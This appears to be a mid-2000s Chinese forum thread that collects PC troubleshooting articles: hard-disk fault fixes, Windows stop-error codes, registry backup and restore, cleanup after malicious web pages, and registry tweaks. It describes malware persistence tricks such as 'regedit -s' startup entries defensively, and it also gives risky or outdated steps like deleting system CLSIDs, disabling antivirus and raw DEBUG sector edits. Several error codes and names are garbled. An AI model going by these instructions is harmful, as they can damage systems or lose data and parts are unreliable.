                      10、提示：INVALID DRIVE SPECIFICATION
                  解决方案：
                  1、重新分区格式化
                  2、如0磁道损坏需要低级格式化，然后用SET COMSPEC（指定COMMAND文件位置），使得COMMAND远离0磁道。

                      当硬盘出现分区故障后，希望用户先用上述方法解决，若不成功，对硬盘分区格式化是解决软故障的基本方法，但信息将被清除。其使用原则是：能用高格解决的不用分区，能用分区解决的不用低级格式化。

                      11、在586电脑上将硬盘软件装好后，在486电脑上不能使用
                      此故障是由于586电脑将硬盘采用了LBA模式，而486默认的模式是NORMAL，所以只要将CMOS的NORMAL改为LBA即可。

                      12、无论在第二IDE口，还是第一IDE口接入光驱或硬盘后，主硬盘都不能用，但硬盘参数又能检测到
                      此类故障比较特殊，常见于老式586电脑上，解决方法是将硬盘的主、副跳线换一下，即从盘变主盘或主盘变从盘。
                      编后话：硬盘故障典型的一般只有以上几种，个别的也可采用以上方案解决，如硬盘出现坏道后，可以引发与读盘错误、死机等一系列故障，还有一种比较特殊的情况就是由于硬盘电缆线质量不佳或某些主板驱动程序的ATA66总线程序未安装而导致计算机速度过慢的现象（笔者就曾遇到过两例）。

                  十大硬盘故障解决办法

                  我们在使用硬盘的时候，常常会出现一些莫名其妙的问题。为了有效地保存硬盘
                  中的数据，除了经常性地进行备份工作以外，还要学会在硬盘出现故障时如何救
                  活硬盘，或者从坏的区域中提取出有用的数据，把损失降到最小程度。在这里我
                  就收集了硬盘常出现的故障解决办法，供大家参考，希望对大家有所帮助：

                      一、系统不认硬盘
                      系统从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上，硬盘本身故障的可能性不大，可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验，就会很快发现故障的所在。如果新接上的硬盘也不被接受，一个常见的原因就是硬盘上的主从跳线，如果一条IDE硬盘线上接两个硬盘设备，就要分清楚主从关系。

                      二、CMOS引起的故障
                       CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto
                  Detect”的功能，可自动检测硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用“Normal，LBA，Large”等，如果在一般的模式下安装了数据，而又在CMOS中改为其它的模式，则会发生硬盘的读写错误故障，因为其映射关系已经改变，将无法读取原来的正确硬盘位置。

                      三、主引导程序引起的启动故障
                      主引导程序位于硬盘的主引导扇区，主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软驱或光驱启动之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的FDISK最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，FDISK.EXE之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从
                  DOS 3.x到Windos 95的DOS，只要找到一种DOS引导盘启动系统并运行此程序即可修复。

                      四、分区表错误引发的启动故障
                      分区表错误是硬盘的严重错误，不同的错误程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过FDISK重置活动分区进行修复。
                      如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32MB的基本DOS分区值为06，而扩展的DOS分区值是05。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值
                  即可使该分区恢复正常。
                      分区表中还有其它数据用于记录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，可用的方法是用备份的分区表数据重新写回，或者从其它的相同类型的并且分区状况相同的硬盘上获取分区表数据。
                      恢复的工具可采用NU等工具软件，操作非常方便。当然也可采用DEBUG进行操作，但操作繁琐并且具有一定的风险。
                      五、分区有效标志错误的故障
                      在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节：“55aa”，此字节为扇区的有效标志。当从硬盘、软盘或光盘启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此处可用于整个硬盘的加密技术，可采用DEBUG方法进行恢复处理。另外，当DOS引导扇区无引导标志时，系统启动将显示为：“Mmissing
                  Operating System”。方便的方法是使用

                  下面的DOS系统通用的修复方法。
                  六、DOS引导系统引起的启动故障
                      DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括IO.SYS、MSDOS.SYS、COMMAND.COM，其中
                  COMMAND.COM是DOS的外壳文件，可用其它的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows
                  95携带的DOS系统中，MSDOS.SYS是一个文本文件，是启动Windows必须的文件，但只启动DOS时可不用此文件。DOS引导出错时，可从软盘或光盘引导系统后使用SYS
                  C:命令传送系统，即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。
                      七、FAT表引起的读写故障
                      FAT表记录着硬盘数据的存储地址，每一个文件都有一组FAT链指定其存放的簇地址。FAT表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个FAT表，如果目前使用的FAT表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其FAT表的长度及第二个FAT表的地址也是不固定的，所以修复时必须正确查找其正确位置，一些工具软件如NU等本身具有这样的修复功能，使用也非常的方便。采用DEBUG也可实现这种操作，即采用其m命令把第二个FAT表移到第一个表处即可。如果第二个FAT表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用
                  CHKDSK或SCANDISK命令进行修复，最终得到*.CHK文件，这便是丢失FAT链的扇区数据。如果是文本文件则可从中提取出完整的或部分的文件内容。
                      八、目录表损坏引起的引导故障
                      目录表记录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号。目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用CHKDSK或SCANDISK程序恢复的方法，从硬盘中搜索出
                  *.CHK文件，由于目录表损坏时仅是首簇号丢失，每一个*..
                  CHK文件即是一个完整的文件，把其改为原来的名字即可恢复大多数文件。
                      九、误删除分区时数据的恢复
                      当用FDISK删除了硬盘分区之后，表面上是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示为无效驱动器。如果了解FDISK的工作原理，就会知道FDISK只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容，具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变。可仿照上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区及数据。如果已经对分区格式化，在先恢复分区后，可按下面的方法恢复分区数据。
                  十、误格式化硬盘数据的恢复
                      在DOS高版本状态下，formAT格式化操作在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区、FAT分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行UNformAT命令即可恢复。另外
                  DOS还提供了一个MIROR命令用于记录当前磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。

                  做爱做的事
                    ●～　　●～　　　●～　　　　●～　　　●～ ……
                  ○　 ●～　 ●～　 ●～
                       ●～　●～　●～　　　●～　　……
                  [3 楼] From:山东省潍坊市 | Posted:2005-05-31 09:40|

            zhuifeng

            级别: 初出茅庐
            精华: 0
            发帖: 145
            威望: 38 点
            取之币: 2 NB
            贡献值: 0 点
            在线时间:5(小时)
            注册时间:2005-06-01
            最后登陆:2005-09-23

                  这么多
                  难为你了~~~

                  ～★张扬个性，展现自我★～

                  [4 楼] From:湖北省武汉市电信ADSL | Posted:2005-06-01 22:58|

            小强

             多看A片不好

            级别: 掌柜
            精华: 5
            发帖: 375
            威望: 397 点
            取之币: 5625 NB
            贡献值: 1 点
            在线时间:172(小时)
            注册时间:2005-05-18
            最后登陆:2005-11-12

                  windows 非法操作详解

                  大家肯定都用过Windows的，想必经历过“非法操作”。一般的“非法操作”有两个选项：“关闭”和“详细资料”。可是“详细资料”里面的内容大多数人都看不明白，只好草草的关闭了。现在不用怕了，我来给大家讲解一下非法作的每个详细资料的具体含义。

                  1.停止错误编号:0x0000000A

                  说明文字:IRQL-NOT-LESS-OR-EQUAL

                  通常的原因:驱动程序使用了不正确的内存地址.

                  解决方法：如果无法登陆,则重新启动计算机.当出现可用的作系统列表时,按F8键.在Windows高级选项菜单屏幕上,选择"最后一次正确的配置",然后按回车键.
                  检查是否正确安装了所有的新硬件或软件.如果这是一次全新安装,请与硬件或软件的制造商联系,获得可能需要的任何Windows更新或驱动程序.
                  运行由计算机制造商提供的所有的系统诊断软件,尤其是内存检查.
                  禁用或卸掉新近安装的硬件(RAM,适配器,硬盘,调制解调器等等),驱动程序或软件.
                  确保硬件设备驱动程序和系统BIOS都是最新的版本.
                  确保制造商可帮助你是否具有最新版本,也可帮助你获得这些硬件.
                  禁用 BIOS内存选项,例如cache或shadow.
                  2.停止错误编号:0x0000001E

                  说明文字:KMODE-EXPTION-NOT-HANDLED

                  通常的原因:内核模式进程试图执行一个非法或未知的处理器指令.

                  解决方法：确保有足够的空间,尤其是在执行一次新安装的时候.
                  如果停止错误消息指出了某个特定的驱动程序,那么禁用他.如果无法启动计算机.应试着用安全模式启动,以便删除或禁用该驱动程序.
                  如果有非 Microsoft支持的视频驱动程序,尽量切换到标准的VGA驱动程序或Windows提供的适当驱动程序.
                  禁用所有新近安装的驱动程序.
                  确保有最新版本的系统BIOS.硬件制造商可帮助确定你是否具有最新版本,也可以帮助你获得他.
                  BIOS内存选项,例如cache,shadow.

                  3.停止错误编号:0x00000023或0x00000024

                  说明文字:FAT-FILE-SYSTEM或MTFS-FILE-SYSTEM

                  通常原因:问题出现在Ntfs.sys(允许系统读写NTFS驱动器的驱动程序文件)内.

                  解决方法：运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件..
                  禁用或卸载所有的反病毒软件,磁盘碎片整理程序或备份程序.
                  通过在命令提示符下运行Chkdsk /f命令检查硬盘驱动器是否损坏,然后重新启动计算机

                  4.停止编号:0x0000002E

                  说明文字:DATA-BUS-ERROR

                  通常的原因:系统内存奇偶校验出错,通常由硬件问题导致.

                  解决方法：卸掉所有新近安装的硬件(RAM.适配器.硬盘.调制解调器等等).
                  运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件.
                  确保硬件设备驱动程序和系统BIOS都是最新版本.
                  使用硬件供应商提供的系统诊断,运行内存检查来查找故障或不匹配的内存.
                  禁用BIOS内存选项,例如cache或shadow.
                  在启动后出现可用作系统列表时,按F8.在Windows高级选项菜单屏幕上,选择"启动VGA模式:.然后按回车键.如果这样做还不能解决问题,可能需要更换不同的视频适配器列表,有关支持的视频适配器列表,请参阅硬件兼容性列表.

                  5.停止编号:0x0000003F

                  说明文字:NO-MOR-SYSTEM-PTES

                  通常的原因:每哟正确清理驱动程序.

                  解决方法：禁用或卸载所有的反病毒软件，磁盘碎片处理程序或备份程序.

                  6:停止错误编号:0x00000058

                  说明文字:FTDISK-INTERN-ERROR

                  通常的原因:容错集内的某个主驱动器发生故障.

                  解决方法：使用Windows安装盘启动计算机,从镜象(第2)系统驱动器引导.有关如何编辑Boot.ini文件以指向镜象系统驱动器的指导,可在MIcrosoft支持服务Web站点搜索"Edit
                  ARC path".
                  windows 非法操作详解

                  7.停止错误编号:0x0000007B

                  说明文字:INACCESSI-BLE-BOOT-DEVICE

                  通常原因:初始化I/O系统(通常是指引导设备或文件系统)失败.

                  解决方法：引导扇区病毒通常会导致这种停止错误.是用反病毒软件的最新版本,检查计算机上是否有存在病毒.如果找到病毒,则必须执行必要的不找把他从计算机上清除掉,请参阅反病毒软件文档了解如何执行这些步骤.
                  卸下所有新近安装的硬件(RAM,适配器,调制解调器等等).
                  核对MIcrosoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容.
                  如果使用的适SCSI适配器,可以从硬件供应商除获得最新WINDOWS驱动程序,禁用SCSI设备的同步协商,检查该SCSI链是否终结,并核对这些设备的SCSI
                  ID,如果无法确定如何执行能够这些步骤,可参考硬件设备的文档.
                  如果你用的是IDE设备,将板上的IDE端口定义为唯一的主端口.核对IDE设备的主/从/唯一设置.卸掉除硬盘之外的所有IDE设备.如果无法确认如何执行这些不找，可参考硬件文档.
                  如果计算机已使用NTFS文件系统格式化,可重新启动计算机,然后在该系统分区上运行Chkdsk
                  /f/r命令.如果由于错误而无法启动系统,那么使用命令控制台,并运行Chkdsk /r命令.
                  运行Chkdsk
                  /f命令以确定文件系统是否损坏.如果Windows不能运行Chkdsk命令,将驱动器移动到其他运行Windows的计算机上,然后从这台计算机上对该驱动器运行Chkdsk命令.

                  8.停止错误编号:0x0000007F

                  说明文字:UNEXPECTED-KERNEL-MODE-TRAP

                  通常的原因:通常是由于硬件或软件问题导致,但一般都由硬件故障引起的..

                  解决方法：核对Microsoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容.如果计算机主板不兼容就会产生这个问题.
                  卸掉所由新近安装的硬件.
                  运行由计算机制造商提供的所有系统诊断软件,尤其是内存检查.
                  禁用BIOS内存选项,例如cache或shadow.

                  9.停止错误编号:0x00000050

                  说明文字:PAGE-FAULT-IN-NONPAGED-AREA

                  通常的原因:内存错误(数据不能使用分页文件交换到磁盘中).

                  解决方法：卸掉所有的新近安装的硬件.
                  运行由计算机制造商提供的所有系统诊断软件.尤其是内存检查.
                  检查是否正确安装了所有新硬件或软件,如果这是一次全新安装,请与硬件或软件制造商联系,获得可能需要的任何Windows更新或驱动程序.
                  禁用或卸载所有的反病毒程序.
                  禁用BIOS内存选项,例如cache或shadow.

                  10.停止错误编号:0x0000007

                  说明文字：KERNEL-STEL-STACK-INPAGE-ERROR

                  通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。

                  解决方法：使用反病毒软件的最新版本，检查计算机上是否有病毒。如果找到病毒，则执行必要的步骤把他从计算机上清除掉。请参阅制造商提供的所有系统诊断软件，尤其是内存检查。
                  禁用BIOS内存选项，例如cache,shadow.

                  11.停止错误编号：0x00000079

                  说明文字：MISMATCHED-HAL

                  通常的原因：硬件抽象层与内核或机器类型不匹配（通常发生在单处理器和多处理器配置文件混合在同一系统的情况下）。

                  解决方法：要解决本错误，可使用命令控制台替换计算机上错误的系统文件。
                  单处理器系统的内核文件是Ntoskml.exe，而多处理器系统的内核文件是Ntkrnlmp.exe，但是，这些文件要与安装媒体上的文件相对应；在安装完Windows2000和，不论使用的是哪个原文件，都会被重命名为Ntoskrnl.exe文件。HAL文件在安装之后也使用名称Hal.dll但是在安装媒体，但是在安装媒体上却有若干个可能的HAL文件。

                  12.停止错误编号：0x0000007A

                  说明文字：KERNEL-DATA-INPAGE-ERROR

                  通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。（通常是由于分页文件上的故障，病毒，磁盘控制器错误或由故障的RAM引起的）。

                  解决方法：使用反病毒软件的最新版本，检查计算机上是否存在病毒。如果找到病毒。则执行必要的步骤把他从计算机上清除掉，请参阅犯病度软件文档了解如何执行这些步骤。
                  如果计算机已使用NTFS文件系统格式化。可重新启动计算机，然后在该系统分区上运行Chkdsk
                  /f/r命令。如果由于错误而无法启动命令，那么使用命令控制台，并运行Chkdsk /r命令。
                  运行由计算机制造商提供的所有的系统在很端软件，尤其是内存检查。

                  13.停止错误编号：0xC000021A

                  说明文字：STATUS-SYSTEM-PROCESS-TERMINATED

                  通常的原因：用户模式子系统，例如Winlogon或客户服务器运行时子系统（CSRSS）已被损坏，所以无法再保证安全性。

                  解决方法：卸掉所有新近安装的硬件。
                  如果无法登陆，则重新启动计算机。当出现可用的作系统列表时按F8。在Windows2000高级选项菜单屏幕上，选择：“最后一次正确的配置”。然后按会车。
                  运行故障恢复台，并允许系统修复任何检测到的错误。

                  14.停止错误编号：0xC0000221

                  说明文字：STATUS-IMAGE-CHECKISU7M-MISMATCH

                  通常的原因：驱动程序或系统DLL已经被损坏。

                  解决方法：运行故障复控台，并且允许系统修复任何检测到的错误。
                  如果在RAM添加到计算机之后，立即发生错误，那么可能是分页文件损坏，或者新RAM由故障或不兼容。删除Pagefile.sys并将系统返回到原来的RAM配置。


注册表及其备份与恢复

《一键清理系统垃圾》

注册表及其备份与恢复

· ·cpcw··2001-19

Windows9x取代DOS已成为操作系统的当然之选。随着功能的丰富，Windows9x所需管理的细节也远远超过DOS。用户不能仅用修改AUTOEXEC或CONFIG来调整如今Windows的配置与状态。它们需要以一种新的方式来存储、分类和编辑。于是，让无数用户“改”心大动的注册表应运而生。用户通过使用，从而更深入了解并掌握Windows9x。由于在Windows9x中采用了注册表方式，使用户可以按自己的要求对计算机系统的硬件和软件进行灵活配置。(本专题中关于注册表的一些技巧在Windows98下调试通过，有的改动后直接起作用，有的需要重新启动计算机后才生效，虽然是在Windows98下调试，但有很多技巧也适用于Windows95和Windows NT)
一、Windows注册表
1.什么是注册表？
注册表是 Windows 的一个内部数据库，是一个巨大的树状分层的数据库。它容纳了应用程序和计算机系统的全部配置信息、系统和应用程序的初始化信息、应用程序和文档文件的关联关系、硬件设备的说明、状态和属性以及各种状态信息和数据。注册表中存放着各种参数，直接控制着Windows的启动、硬件驱动程序的装载以及一些Windows应用程序的运行，从而在整个Windows系统中起着核心作用。它包括如下一些内容：
(1)软、硬件的有关配置和状态信息，注册表中保存有应用程序和资源管理器外壳的初始条件、首选项和卸载数据。
(2)联网计算机的整个系统的设置和各种许可、文件扩展名与应用程序的关联关系，硬件部件的描述、状态和属性。
(3)性能记录和其它底层的系统状态信息，以及其它一些数据。
如果注册表受到了破坏，轻者使Windows在启动的过程出现异常，重者可能会导致整个系统的完全瘫痪。因此正确地认识、使用，特别是及时备份以及有问题时恢复注册表，对Windows用户来说就显得非常重要了。
2.注册表文件：.DAT
Windows98将所有注册表文件存入2个文件System.dat和User.dat中。它们是二进制文件，不能用文本编辑器打开查看。它们存于Windows目录下，具有隐含、系统和只读属性。 System.dat包含了计算机特定的配置数据，如安装的硬件和设备驱动程序的有关信息等。User.dat包含了用户特定的数据，如桌面设置，墙纸和窗口颜色设置等。User.dat文件的位置在以某个用户名登录时，其位于C\Windows\profiles\用户名目录下，系统同时在C\Windows目录下保留了一个缺省的User.dat文件，以备新用户使用。
说明：System.da0和User.da0这两个文件属于Windows95，是注册表的备份文件，它们在系统每次成功启动后创建。在Windows98中，注册表检查器将备份文件做成CAB文件。
二、注册表编辑器——Registry Editor
1.打开注册表编辑器
注册表的打开方式很简单，单击Windows“开始”按钮，找到“运行”，鼠标左键单击。在弹出的运行对话框中填入 regedit，按“确定”按钮即可。
我们可以看到，在注册表中，所有的数据都是通过一种树状结构以键和子键的方式组织起来，十分类似于目录结构。每个键都包含了一组特定的信息，每个键的键名都是和它所包含的信息相关的。
2.注册表编辑器的基本操作
注册表编辑器有一些基本操作命令，在这里以当前使用的Desktop为例来说明注册表编辑器的基本操作。
(1) 打开HKEY_CURRENT_USER\Control Panel\desktop\WindowMetrics，在右边的窗口中是一些名称和数据。
(2)用鼠标右键单击编辑器右边的窗格，会弹出一个快捷菜单，可以选择它来创建一个主键、一个字符串、一个二进制值或者一个DWORD值。
(3)右击编辑器左边窗格的desktop关键字，会弹出另一个快捷菜单，在这里，你可以创建一个新的主键、串值、二进制值或者DWORD值，还可以进行查找、删除和重命名等操作。
(4)双击编辑器右边的窗格中的关键字名，将会弹出一个编辑窗口，在那儿可以调整常量的值，或者删除该常量，以及进行重命名等，比如双击字符串“ScreenSaveActive”，弹出如图2的对话框。
三、注册表的备份与恢复
在安装新的应用程序或添加新硬件时都可能搞乱系统的注册表，从而引发不测，所以应该定期地备份user.dat和system.dat文件(编者：在进行注册表修改之前，强烈建议你先备份注册表，以防修改过程误操作引起系统崩溃)。
在Windows98中的Windows目录下，仍有System.dat和User.dat两个文件用来存放系统注册表信息。下面笔者就根据自己的使用体会来谈谈在Windows98中对注册表进行备份及恢复的几种常用方法。
1.直接进行备份与恢复
这是一种很原始的方法，即直接将所需之System.dat及User.dat两个文件拷贝存放在硬盘某个指定目录下或直接拷到软盘上作为备份，恢复时再将该备份替换覆盖回原处即可，当然在备份及恢复时都需对这两个文件的只读及隐藏属性进行相应的修改操作，让隐藏文件显示出来。
说明：如因注册表问题而导致系统瘫痪，开机后无法进入Windows系统时，可用应急启动盘进入Windows98自带的DOS界面后，用常规的DOS操作来将存在硬盘或软盘中的备份覆盖回原处，恢复备份的注册表数据。
2.注册表编辑器的导出与引入
运行Regedit.exe打开Windows98注册表后，利用“注册表”的“导出”及“引入”功能也可以用来备份或恢复注册表信息。具体方法为：在“注册表编辑器”窗口中点击左上角“注册表”下拉菜单，点击“导出注册表文件……”项，在出现的“导出注表文件”对话框中，键入欲备份注册表的文件名及其保存位置，再按“保存”按钮即可。需恢复注册表时，用同样的方法打开注册表编辑器，打开“注册表”下拉菜单后点击“引入注册表文件……”项，在出现的对话框中选中所需恢复的备份文件，再按“打开”按钮即可将该注表备份恢复回Windows系统了。
说明：该方法主要适合于Windows系统还未瘫痪或可以通过安全模式启动Windows98系统时恢复注册表之用，如因注册表问题而无法进入Windows系统时，则该法就无能为力了。
3.系统的注册表自动备份
在Windows98中，取消了Windows 95中每次开机时自动以System.da0和User.da0为名的两个文件来备份注册表数据的功能，而新增加了一个以.Cab(Cabinet)作后缀的压缩文件作为注册表备份的功能，具体使用如下：
该备份过程是由Windows98系统自动完成的。在用户当天第一次开机时，Windows98将会自动将系统中原有的注表信息，包括System.dat、User.dat、System.ini和Win.ini这四个文件都压缩成Cab形式的文件，在Windows\Sysbacup 目录下会有诸如rb000.cab和rb001.cab之类的压缩文件，这几个就是最近的五个系统备份(Windows\Sysbckup是隐藏目录，要查看须让隐藏的文件和目录显示出来)。系统自动保存最近5次开机的注册表数据。
一般说来，当Windows98安装好后，会在启动时自动运行Scanregw.exe/autorun，目的是每天备份一次注册表。你可以在开始选单上选择运行“Msconfig”，运行Microsoft的系统配置程序，点“启动”选项，查看该命令是否运行。倘若该命令没有被运行，则运行注册表编辑器“Regedit”，在“HKEY_LOCAL_MACHINE\Soft ware\Microsoft\Windows\CurrentVersion\Run”主键下新建一个字符串值，键值为“C\Windows\scanregw.exe/autorun”(这里假设Windows98安装目录为C\Windows)。这样，Windows98就会自动备份最近5次的注册表，以rb00.cab形式存放在C\Windows\Sysbckup\路径下。


注册表修复不成功的原因

《一键清理系统垃圾》

注册表修复不成功的原因

道高一尺，魔高一丈，恶意网页的卑鄙手段可谓是“推陈出新”啊。用一些简单的注册表修复方法后，已经不能完全解决问题了。如果你的注册表在恢复后又回到了被修改的老样子,不妨看看是否是以下原因引起的呢？

    1.修改注册表禁止命令形式的修改，目的是不让用户通过注册表修复回去。

    最通常的修改是锁住注册表，还有破坏关联：比如.reg，.vbs，.inf等

    关于解锁注册表，在前面已经介绍了方法，至于被修改关联，只要我前面说的注册表修改的方法里的关联还 能用，就可以用其中的任意一个，但如果.reg，.vbs，.inf都被修改了，怎么办啊？，也不用怕，把 .exe 后缀改为.com后缀，我一样可以编辑注册表，.com也被改了，怎么办？没那么狠吧，行，我再改后缀为.scr 。嘿嘿，一样还可以修改。

    最好的最简单的办法，马上重新启动，按F8进入DOS下，敲入SCANREG/RESTORE，选择以前的正常时的注册表 还原就可以，注意了，一定要选择没被修改时的注册表！如果发现连scanreg都被删除了(一些网站就是这么 狠的，用A盘COPY一个scanreg.exe到COMMAN下即可

    有必要在这里说说常见的文件关联的默认值

    正常的exe关联为[HKEY_CLASSES_ROOT\exefile\shell\open\command]

    默认的键值为："%1 %*" 将此关联改回去即可使用exe文件

    2.修改注册表后留后门，目的让你修改注册表好像成功，重新启动后又恢复到被修改的状态。

    这主要是在启动项里留了后门，大家可以打开注册表到（也可以用一些工具比如优化大师等来察看)

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersionRun-

    看看有没有可疑的启动项目，这一点最多朋友忽略，哪些启动可疑呢？

    我这里给出几个大家需要注意的,启动项里键值有出现.hml和.htm后缀的，最好都去掉，还有有.vbs后缀的 启动项也去掉，还有一个很重要的，如果有这一个启动项，出现有类似键值的，比如：

    system 键值是regedit -s c:\windows……请注意，这个regedit -s 是注册表的一个后门参数，是用来导 入注册表的，这样的选项一定要去掉

    还有一类修改会在c:\windows\产生.vbs后缀的文件，或是.dll文件，其实.dll文件实际是.reg文件(乔装成DLL文件的恶意网页病毒)

    此时你要看看c:\windows\win.ini文件，看看load=，run=，这两个选项后面应该是空的，如果有其他程序 修改load=，run=，将=后面程序删除，删除前看看路径和文件名，删除后在到system下删除对应的文件

    还有一种方法，大家如果屡次修改重启又恢复回去，可以搜索C盘下所有的.vbs文件，可能有隐藏的，用记 事本打开，看到里面有关于修改注册表的都把它删除或保险起见把后缀改掉，你可以按中恶意网页的病毒的 时间来搜索文件:)

    下面的这个漏洞大家非常值得注意，很多朋友说，你说的方法我都试了，启动项里绝对没有什么可疑的，也没有什么vbs文件，呵呵，大家在启动IE时还有一个陷阱，就是IE主界面的工具的菜单里的广告，一定要去 掉，因为这些会在你启动IE时启动，所以你修改完其他的先别着急打开IE窗口，否则白费力气，方法：打开注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions看到广告就删，别留情！

    一个很重要的问题，在中了恶意网页的陷阱后一定要先清空IE所有临时文件，切记！

    说了那么多，那如何防御这类恶意网页呢？

    一个一劳永逸的方法，把F935DC22-1CF0-11D0-ADB9-00C04FD58A0B这个ID删掉在注册表的路径为HKEY_CLASSES_ROOT\CLSID\{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

    记住，看清楚了再删除，千万别删错其他。删掉这个F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对系统不会有影响的。

    在IE的选单栏中选择“工具”→“Internet选项”，在弹出的对话框中切换到“安全”标签，选择“ Internet”后点击“自定义级别”按钮，在“安全设置”对话框中，把“ActiveX控件和插件”、“脚本” 中的相关选项全部选择“禁用”或“提示”即可。但如果选择了“禁用”，一些正常使用ActiveX和脚本的 网站可能无法完全显示。建议选择：提示。遇到警告时，看看该网站的原代码，如果发现有出现 Shl.RegWrite等的代码，就不要去了，如果是加密的原代码，不是自己熟悉的网站也不要去，如果连右键都用不了的，也要小心为好(看看原码有什么所谓啊，除非有什么好的JAVA或是恶意代码）

    对于Windows98用户，请打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP，把其中的“ActiveXComponent.class删掉，对于WindowsMe用户，请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP，把其中的“ActiveXComponent.class”删掉，这些删掉不会影响正常浏览网页

    在Windows 2000/XP，可以通过禁用“远程注册表服务”来阻挡部分恶意脚本。具体方法是：在“控制面板”→“管理工具”→“服务”中右键单击“Remote Registry Service”，在弹出选单中选择“属性”，打开属性对话框，在“General”内将“Startup ype”设为“Disabled”。这样也可以拦截部分恶意脚本程序。

    嘿嘿，不用IE。用其他浏览器也可以……大家在中了恶意网页的陷阱后，先不要立即重新启动计算机，到启动项里看看，有没有什么危险的启动项，不如deltree之类的


注册表修改指南（一）

《一键清理系统垃圾》

注册表修改指南（一）

2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------
p>1 提高子菜单速度
位 置：HKEY_CURRENT_USER\Control Panel\Desktop
键值名：Menushowdelay
    双击键值Menushowdelay后，弹出该键值的编辑窗口，在文本输入框内输入“0”后，再单击“确定”按钮即可。注意在系统默认的菜单弹出效果下，不易感觉到菜单弹出速度的提高；这时，请在桌面上单击“属性”命令，弹出“显示 属性”窗口，然后在“效果”标签下将“动画显示菜单和工具提示”下的“淡入淡出效果”改为“滚动效果”。

2 去掉“关闭系统”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoClose
取 值：1为隐藏、0为显示

3 自动刷新窗口内容
位 置：HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control\Update
键值名：UpdateMode
取 值：0、1
若“UpdateMode”键值为0，则设置为自动刷新，
若“UpdateMode”键值为1，则设置为手工刷新；
这等于在资源管理器窗口内按“F5”键或者在“查看”菜单中选择“刷新”命令。

4 去掉“设置”
一 位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoSetFolders
取 值：1为隐藏、0为显示
二 位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoSetTaskbar
取 值：1为隐藏、0为显示

5 去掉升级
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoCommonGroups
取 值：1为隐藏、0为显示

6 去掉“文档”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoRecentDocsMenu
取 值：1为隐藏、0为显示

7 自动清除“文档”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：ClearRecentDocsOnExit
取 值：1为自动清除、0为不自动清除

8 去掉“查找”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoFind
取 值：1为隐藏、0为显示

9 锁定“文档”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoRecentDocsHistory
取 值：1为锁定、0为不锁定

10 去掉“运行”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoRun
取 值：1为隐藏、0为显示

注册表修改指南（二）
